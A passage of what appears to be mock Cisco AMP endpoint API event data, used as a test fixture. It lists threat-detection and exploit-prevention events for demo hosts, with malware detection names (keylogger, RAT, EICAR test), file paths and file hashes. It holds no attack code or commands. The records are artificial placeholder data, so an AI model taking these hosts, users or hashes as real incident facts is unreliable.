Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255674222116885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055368265531000,"timestamp":1610705053,"timestamp_nanoseconds":870000000,"date":"2021-01-15T10:04:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055368265531411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255622682509000,"timestamp":1610705052,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:04:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255622682509332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055359675597000,"timestamp":1610705051,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:04:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055359675596818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055355380630000,"timestamp":1610705050,"timestamp_nanoseconds":667000000,"date":"2021-01-15T10:04:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055355380629521","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1ds","file_path":"\\\\?\\C:\\WINDOWS\\system32\\config\\systemprofile\\Desktop\\s1ds","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662224","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662223","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":885000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694926","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":760000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:04:06+00:00","event_type_id":1090519104,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":928000000,"date":"2021-01-15T10:04:06+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe","attacked_module":"C:\\Program Files\\Mozilla Firefox\\xul.dll","base_address":"0x7D1E0000","suspicious_files":[""],"indicators":[{"tactics":["TA0009"],"severity":"medium","description":"DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.","short_description":"Dealply adware detected","id":"44cfe1c4-3dc4-4619-be6b-88c9d69c2a97","techniques":["T1185"]}]}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055321020891000,"timestamp":1610705042,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:04:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055321020891148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s234","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s234","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255571142902000,"timestamp":1610705040,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:04:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255571142901779","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055308135989000,"timestamp":1610705039,"timestamp_nanoseconds":416000000,"date":"2021-01-15T10:03:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055308135989259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":354000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255523898262000,"timestamp":1610705029,"timestamp_nanoseconds":26000000,"date":"2021-01-15T10:03:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255523898261522","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055260891349000,"timestamp":1610705028,"timestamp_nanoseconds":744000000,"date":"2021-01-15T10:03:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055260891349000","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055248006447000,"timestamp":1610705025,"timestamp_nanoseconds":103000000,"date":"2021-01-15T10:03:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055248006447111","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1j4","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1j4","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":119000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512518","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} 